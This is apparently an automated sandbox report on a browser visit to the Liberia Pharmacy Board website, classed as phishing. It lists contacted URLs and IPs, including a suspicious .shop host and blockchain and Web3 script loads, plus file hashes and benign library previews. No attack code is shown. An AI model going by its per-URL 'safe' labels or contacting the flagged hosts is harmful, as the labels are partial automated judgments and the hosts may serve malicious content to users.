                                            unknown
                                            https://mc.yandex.com/watch/99162160?wmode=7&page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085448%3Aet%3A1736517288%3Ac%3A1%3Arn%3A547745590%3Arqn%3A1%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A6235%3Awv%3A2%3Ads%3A48%2C619%2C732%2C264%2C2544%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1736517279176%3Arqnl%3A1%3Ast%3A1736517290%3At%3ALiberia%20Pharmacy%20Board&t=gdpr(14)clc(0-0-0)rqnt(1)aw(1)rcm(1)cdl(na)eco(42009088)ti(1)false
                                              high
                                              http://www.lpb.gov.lr/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.lpb.gov.lr/wp-content/themes/betheme/assets/animations/animations.min.css?ver=27.0.7false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.lpb.gov.lr/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.3false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0.2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.lpb.gov.lr/wp-content/themes/betheme/js/scripts.js?ver=27.0.7false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.jsfalse
                                                high
                                                https://lpb.gov.lr/false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://mc.yandex.ru/metrika/tag.jsfalse
                                                  high
                                                  https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/slick.min.js?ver=27.0.7false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://mc.yandex.com/clmap/99162160?page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&pointer-click=rn%3A964157177%3Ax%3A39789%3Ay%3A30426%3At%3A97%3Ap%3A%3FAAA3%3AX%3A519%3AY%3A451&browser-info=u%3A1736517288271535202%3Av%3A1551%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Arqnl%3A1%3Ast%3A1736517298&t=gdpr(14)ti(1)false
                                                    high
                                                    https://s.w.org/images/core/emoji/15.0.3/svg/2705.svgfalse
                                                      high
                                                      https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0.2false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0.2false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.6.13false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://mc.yandex.com/watch/99162160/1?page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&hittoken=1736517291_cee59135203049223fa15c9996fec59728bb28076bcf89908843ed89232c137b&browser-info=nb%3A1%3Acl%3A4059%3Aar%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A1%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085513%3Aet%3A1736517314%3Ac%3A1%3Arn%3A428194297%3Arqn%3A3%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Aco%3A0%3Acpf%3A1%3Aeu%3A2%3Ans%3A1736517279176%3Aadb%3A2%3Arqnl%3A1%3Ast%3A1736517314&t=gdpr(14)mc(g-1)clc(1-519-451)rqnt(3)aw(1)rcm(1)cdl(na)eco(42009088)dss(2)fid(100)ti(0)&force-urlencoded=1&site-info=%7B%22__ym%22%3A%7B%22ct%22%3A%5B%5D%7D%7Dfalse
                                                        high
                                                        https://www.lpb.gov.lr/wp-content/uploads/so-css/so-css-betheme.css?ver=1707433542false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bsc-dataseed.binance.org/false
                                                          high
                                                          https://www.lpb.gov.lr/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.lpb.gov.lr/wp-content/themes/betheme/js/menu.js?ver=27.0.7false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.lpb.gov.lr/wp-content/themes/betheme/css/be.css?ver=27.0.7false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.lpb.gov.lr/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.lpb.gov.lr/wp-content/uploads/2024/01/logo-1-150x150.pngfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.lpb.gov.lr/wp-content/themes/betheme/css/responsive.css?ver=27.0.7false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.lpb.gov.lr/wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=27.0.7false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://mc.yandex.com/watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085448%3Aet%3A1736517288%3Ac%3A1%3Arn%3A547745590%3Arqn%3A1%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A6235%3Awv%3A2%3Ads%3A48%2C619%2C732%2C264%2C2544%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1736517279176%3Arqnl%3A1%3Ast%3A1736517290%3At%3ALiberia%20Pharmacy%20Board&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088%29ti%281%29&redirnss=1false
                                                            high
                                                            https://mc.yandex.com/sync_cookie_image_decide_secondary?token=10611.E_RPzEtQddV8vnmbmr337l8AhKpNAjExaO0ma2jrV489UWaaLcmew_vNOEzVVPlR4V0FkyWD6tXvOp-koVN4RFDajfKwVa-Gertbh0JBcbX7PWnGfqkkQHr8KV5-eSQqWHn092q-SAJ5wKt9uy2VlOci2cQHhZ5JYTT9ijqlRQDjDYA59lR6Mi019uer4JP27BgRTrcR1okFFbS3WOEs7pWSj2X1DAQIkARvPEEYVhY%2C.q-OV7mq2OrNzjNUPbRt_MqDduHY%2Cfalse
                                                              high
                                                              https://www.lpb.gov.lr/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.min.css?ver=27.0.7false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://mc.yandex.com/watch/99162160/1?page-url=goal%3A%2F%2Fwww.lpb.gov.lr%2FClick&page-ref=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&hittoken=1736517291_cee59135203049223fa15c9996fec59728bb28076bcf89908843ed89232c137b&browser-info=ar%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A3%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A1%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085457%3Aet%3A1736517298%3Ac%3A1%3Arn%3A260329270%3Arqn%3A2%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Ads%3A%2C%2C%2C%2C%2C%2C%2C5854%2C19%2C14915%2C14915%2C3%2C10062%3Aco%3A0%3Acpf%3A1%3Aeu%3A2%3Ans%3A1736517279176%3Aadb%3A2%3Arqnl%3A1%3Ast%3A1736517298%3At%3ALiberia%20Pharmacy%20Board&t=gdpr(14)clc(1-519-451)rqnt(2)aw(1)rcm(1)cdl(na)eco(42009088)dss(2)ti(0)&force-urlencoded=1&site-info=%7B%22clientID%22%3A%22c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe%22%7Dfalse
                                                                high
                                                                https://www.lpb.gov.lr/wp-includes/js/comment-reply.min.js?ver=6.7.1false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.13false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.jsfalse
                                                                  high
                                                                  https://mc.yandex.com/sync_cookie_image_check_secondaryfalse
                                                                    high
                                                                    https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.jsfalse
                                                                      high
                                                                      https://www.lpb.gov.lr/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.lpb.gov.lr/wp-content/themes/betheme/js/parallax/translate3d.js?ver=27.0.7false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.lpb.gov.lr/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.lpb.gov.lr/wp-includes/js/jquery/jquery.min.js?ver=3.7.1false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-100x75.pngchromecache_153.4.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.lpb.gov.lr/comments/feed/chromecache_153.4.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.lpb.gov.lr/2017/02/03/pharmacy-medicine-store-license-requirements/chromecache_153.4.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://mc.yandex.chromecache_205.4.dr, chromecache_207.4.drfalse
                                                                        high
                                                                        https://www.lpb.gov.lr/over-the-counter-medicine/chromecache_153.4.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.lpb.gov.lr/wp-json/chromecache_153.4.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.lpb.gov.lr/research-drugs-information-center/chromecache_153.4.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.lpb.gov.lr/cpd-provider-reg-form/chromecache_153.4.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://fontawesome.com/licensechromecache_150.4.drfalse
                                                                          high
                                                                          https://fontawesome.comchromecache_148.4.drfalse
                                                                            high
                                                                            https://github.com/mmkjony/enllax.jschromecache_169.4.dr, chromecache_131.4.drfalse
                                                                              high
                                                                              http://fontawesome.comchromecache_150.4.drfalse
                                                                                high
                                                                                https://cdn.jsdelivr.net/npm/web3chromecache_153.4.drfalse
                                                                                  high
                                                                                  https://github.com/nodeca/pakochromecache_182.4.dr, chromecache_120.4.drfalse
                                                                                    high
                                                                                    https://www.lpb.gov.lr/wp-content/uploads/2024/01/logo-1-79x75.pngchromecache_153.4.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.themepunch.com/support-centerchromecache_179.4.dr, chromecache_187.4.drfalse
                                                                                      high
                                                                                      https://www.lpb.gov.lr/2017/02/03/operating-standared/chromecache_153.4.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://mc.yandex.md/ccchromecache_205.4.dr, chromecache_207.4.drfalse
                                                                                        high
                                                                                        https://www.themepunch.com/links/slider_revolution_wordpress_regular_licensechromecache_187.4.drfalse
                                                                                          high
                                                                                          https://dmp.adform.net/serving/cookie/match?party=1123chromecache_137.4.drfalse
                                                                                            high
                                                                                            https://api.jqueryui.com/position/chromecache_178.4.dr, chromecache_111.4.drfalse
                                                                                              high
                                                                                              http://kenwheeler.github.iochromecache_115.4.dr, chromecache_177.4.drfalse
                                                                                                high
                                                                                                http://dimsemenov.com/plugins/magnific-popup/chromecache_175.4.dr, chromecache_122.4.drfalse
                                                                                                  high
                                                                                                  https://mc.kinopoisk.ru/sync_cookie_image_checkchromecache_137.4.drfalse
                                                                                                    high
                                                                                                    https://www.lpb.gov.lr/contact/chromecache_153.4.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.lpb.gov.lr/about/chromecache_153.4.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-500x375.pngchromecache_153.4.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.lpb.gov.lr/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.lpb.gov.lr%2F&format=xmlchromecache_153.4.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://eu.asas.yango.com/mapuidchromecache_205.4.dr, chromecache_207.4.drfalse
                                                                                                      high
                                                                                                      https://github.com/joemottershaw/chromecache_193.4.dr, chromecache_139.4.drfalse
                                                                                                        high
                                                                                                        https://github.com/louisremi/jquery-smartresizechromecache_203.4.dr, chromecache_152.4.drfalse
                                                                                                          high
                                                                                                          https://www.lpb.gov.lr/cpd-course-application-form/chromecache_153.4.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.lpb.gov.lr/board-members/chromecache_153.4.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.lpb.gov.lr/events/chromecache_153.4.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://greensock.com/standard-licensechromecache_164.4.dr, chromecache_200.4.drfalse
                                                                                                            high
                                                                                                            https://www.lpb.gov.lrchromecache_153.4.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.lpb.gov.lr/cpd/chromecache_153.4.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-480x360.pngchromecache_153.4.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.lpb.gov.lr/gallery/chromecache_153.4.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.lpb.gov.lr/2017/02/03/vestibulum-at-pulvinar-nullam/chromecache_153.4.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-100x75.pngchromecache_153.4.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.lpb.gov.lr/wp-content/uploads/2024/02/cover-pages-image-2.png);background-repeat:no-repechromecache_153.4.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://yastatic.net/s3/taxi-front/yango-gdpr-popup/chromecache_205.4.dr, chromecache_207.4.drfalse
                                                                                                              high
                                                                                                              https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-1200x900.pngchromecache_153.4.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://jqueryui.comchromecache_111.4.dr, chromecache_142.4.drfalse
                                                                                                                high
                                                                                                                https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-480x360.pngchromecache_153.4.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://plugins.jquery.com/project/touchSwipechromecache_164.4.dr, chromecache_200.4.drfalse
                                                                                                                  high
                                                                                                                  https://www.lpb.gov.lr/xmlrpc.php?rsdchromecache_153.4.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://github.com/mattbryson/TouchSwipe-Jquery-Pluginchromecache_164.4.dr, chromecache_200.4.drfalse
                                                                                                                    high
                                                                                                                    https://www.lpb.gov.lr/wp-json/wp/v2/pages/2chromecache_153.4.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.lpb.gov.lr/home/feed/chromecache_153.4.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://fontawesome.com/license/freechromecache_148.4.drfalse
                                                                                                                      high
                                                                                                                      https://www.lpb.gov.lr/2017/02/03/mauris-auctor-non-velit-metus/chromecache_153.4.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-768x576.pngchromecache_153.4.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://www.lpb.gov.lr/staff-profiles/chromecache_153.4.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://www.lpb.gov.lr/registered-professionals/chromecache_153.4.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://www.lpb.gov.lr/rosource-center/chromecache_153.4.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://cdn.jsdelivr.net/npm/crypto-jschromecache_153.4.drfalse
                                                                                                                        high
                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs
                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        52.223.34.155
                                                                                                                        unknownUnited States
                                                                                                                        8987AMAZONEXPANSIONGBfalse
                                                                                                                        192.0.77.48
                                                                                                                        s.w.orgUnited States
                                                                                                                        2635AUTOMATTICUSfalse
                                                                                                                        35.71.137.105
                                                                                                                        a1d4ba62fdc34338f.awsglobalaccelerator.comUnited States
                                                                                                                        237MERIT-AS-14USfalse
                                                                                                                        93.158.134.119
                                                                                                                        mc.yandex.ruRussian Federation
                                                                                                                        13238YANDEXRUfalse
                                                                                                                        142.250.185.164
                                                                                                                        unknownUnited States
                                                                                                                        15169GOOGLEUSfalse
                                                                                                                        3.33.155.121
                                                                                                                        a37dd8b3f3000a75e.awsglobalaccelerator.comUnited States
                                                                                                                        8987AMAZONEXPANSIONGBfalse
                                                                                                                        87.250.251.119
                                                                                                                        unknownRussian Federation
                                                                                                                        13238YANDEXRUfalse
                                                                                                                        74.125.250.129
                                                                                                                        stun.l.google.comUnited States
                                                                                                                        15169GOOGLEUSfalse
                                                                                                                        142.250.185.68
                                                                                                                        www.google.comUnited States
                                                                                                                        15169GOOGLEUSfalse
                                                                                                                        216.58.212.132
                                                                                                                        unknownUnited States
                                                                                                                        15169GOOGLEUSfalse
                                                                                                                        185.121.235.167
                                                                                                                        saaadnesss.shopSpain
                                                                                                                        198432IPCORE-ASESfalse
                                                                                                                        69.163.179.33
                                                                                                                        lpb.gov.lrUnited States
                                                                                                                        26347DREAMHOST-ASUSfalse
                                                                                                                        151.101.65.229
                                                                                                                        jsdelivr.map.fastly.netUnited States
                                                                                                                        54113FASTLYUSfalse
                                                                                                                        15.197.152.159
                                                                                                                        unknownUnited States
                                                                                                                        7430TANDEMUSfalse
                                                                                                                        239.255.255.250
                                                                                                                        unknownReserved
                                                                                                                        unknownunknownfalse
                                                                                                                        77.88.21.119
                                                                                                                        unknownRussian Federation
                                                                                                                        13238YANDEXRUfalse
                                                                                                                        104.17.25.14
                                                                                                                        cdnjs.cloudflare.comUnited States
                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                        IP
                                                                                                                        192.168.2.7
                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                        Analysis ID:1587560
                                                                                                                        Start date and time:2025-01-10 14:53:34 +01:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 3m 28s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:browseurl.jbs
                                                                                                                        Sample URL:http://www.lpb.gov.lr
                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                        Number of analysed new started processes analysed:13
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:0
                                                                                                                        Technologies:
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal64.phis.win@18/159@51/18
                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.184.227, 64.233.167.84, 172.217.18.14, 172.217.16.142, 172.217.18.110, 142.250.186.46, 142.250.185.106, 104.18.186.31, 104.18.187.31, 172.217.18.3, 104.21.27.152, 172.67.142.245, 199.232.210.172, 216.58.212.138, 142.250.186.106, 142.250.185.234, 172.217.18.10, 142.250.186.170, 142.250.185.170, 142.250.181.234, 142.250.185.202, 216.58.206.42, 172.217.16.202, 142.250.184.202, 142.250.184.234, 216.58.206.74, 142.250.186.138, 142.250.185.74, 142.250.185.174, 142.250.184.206, 216.58.206.78, 142.250.185.206, 142.250.186.78, 142.250.185.67, 142.250.181.238, 142.250.185.238, 13.107.246.45, 2.23.242.162, 4.245.163.56, 52.149.20.212
                                                                                                                        • Excluded domains from analysis (whitelisted): fonts.googleapis.com, cdn.jsdelivr.net.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, use.fontawesome.com.cdn.cloudflare.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                        • VT rate limit hit for: http://www.lpb.gov.lr
                                                                                                                        No simulations
                                                                                                                        No context
                                                                                                                        No context
                                                                                                                        No context
                                                                                                                        No context
                                                                                                                        No context
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):21464
                                                                                                                        Entropy (8bit):5.303481082929494
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:G/rsrDr8LVyraS3dtrqorqr8hrpCip8fuxNhBGX0CiS9rH/OrLrErJ29FkFvd:iS33Z5vK47kv
                                                                                                                        MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                                                                        SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                                                                        SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                                                                        SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
                                                                                                                        Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (634)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):52577
                                                                                                                        Entropy (8bit):5.2580583089754285
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:BgPEvfSOqM/MvnRo7o5MDEGfL55jJsDIeJpAHk0vQ:B7wdzGfL5Ds7p+PI
                                                                                                                        MD5:0BA3E2243F42575817B07FCADACF8269
                                                                                                                        SHA1:50ED3259514F428897730C9D429974BDC72EB988
                                                                                                                        SHA-256:6E6C69BA30DA65996FE5CFD06A9248AD71966D7F05781B646D87358A7E202511
                                                                                                                        SHA-512:B135E7CDD316D76EF78702608251A06BDF1F201EF9D9E651F7B24F3246E62E9601359670ADCFE75B0BB7E1741738838728C3B2753E9A193F6C2E7B5356D05673
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*. * jPlayer Plugin for jQuery JavaScript Library. * http://www.jplayer.org. *. * Copyright (c) 2009 - 2013 Happyworm Ltd. * Licensed under the MIT license.. * http://opensource.org/licenses/MIT. *. * Author: Mark J Panaghiston. * Version: 2.5.0. * Date: 7th November 2013. */..(function(b,f){"function"===typeof define&&define.amd?define(["jquery"],f):b.jQuery?f(b.jQuery):f(b.Zepto)})(this,function(b,f){b.fn.jPlayer=function(a){var c="string"===typeof a,d=Array.prototype.slice.call(arguments,1),e=this;a=!c&&d.length?b.extend.apply(null,[!0,a].concat(d)):a;if(c&&"_"===a.charAt(0))return e;c?this.each(function(){var c=b(this).data("jPlayer"),h=c&&b.isFunction(c[a])?c[a].apply(c,d):c;if(h!==c&&h!==f)return e=h,!1}):this.each(function(){var c=b(this).data("jPlayer");c?c.option(a||.{}):b(this).data("jPlayer",new b.jPlayer(a,this))});return e};b.jPlayer=function(a,c){if(arguments.length){this.element=b(c);this.options=b.extend(!0,{},this.options,a);var d=this;this.element.on("remove.jPlayer"
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):9141
                                                                                                                        Entropy (8bit):5.2975271144294185
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:s6zoFrnW4iaX3LzDk1jpJLB2hlq717+3uClD2tFtJ7bykd+SHS+F:s6Udn3LzoJphH8uClD2tFtJ7byTwtF
                                                                                                                        MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
